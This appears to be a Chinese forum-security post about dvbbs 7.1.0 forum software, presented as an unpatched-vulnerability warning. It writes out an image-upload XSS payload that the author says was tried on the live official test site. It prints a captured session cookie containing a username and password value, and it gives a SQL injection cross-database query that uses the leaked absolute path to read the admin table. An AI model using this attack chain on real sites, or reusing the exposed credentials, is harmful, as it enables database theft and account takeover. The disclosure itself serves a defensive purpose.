动网官方与站长站均存在严重漏洞,可大致入侵,内有说名,请尽快修复! dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞 dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现sql跨库查询等。 漏洞利用例子: 一、泄露绝对漏洞测试: 对官方的测试站点:bbs.dvbbs.net 上传一张图,代码如下: gif89a [code]<script> alert(document.cookie) </script>[/code] 抓包得到cookie如下 cookie: aspsessionidssdscbqd=nhanobncapcpamcfmagdijcb; dwebdvbbs7%2e1%2e0=userid=617054&usercookies=1&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&username=linzibct&password=t8ob621664s5v6hl&userhidden=2&statuserid=2189992004; dvbbs= 分析cookie可以得到站点的绝对路径如下: d:\\web\\dvbbs7为论谈的绝对路径 二、攻击延伸: www.host.com 主程序存在sql注入漏洞,但是找不到表名和字段名。 注入点假设: www.host.com\\linzi.asp?****=you 论谈为dvbbs 7.1.0 ,数据库为data\\\\dvbbs.asp,做了防下载处理. 利用上面的动网暴路径,抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp 实现跨库查询如下: www.host.com\\linzi.asp?****=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp") 官方补丁: 尚无
|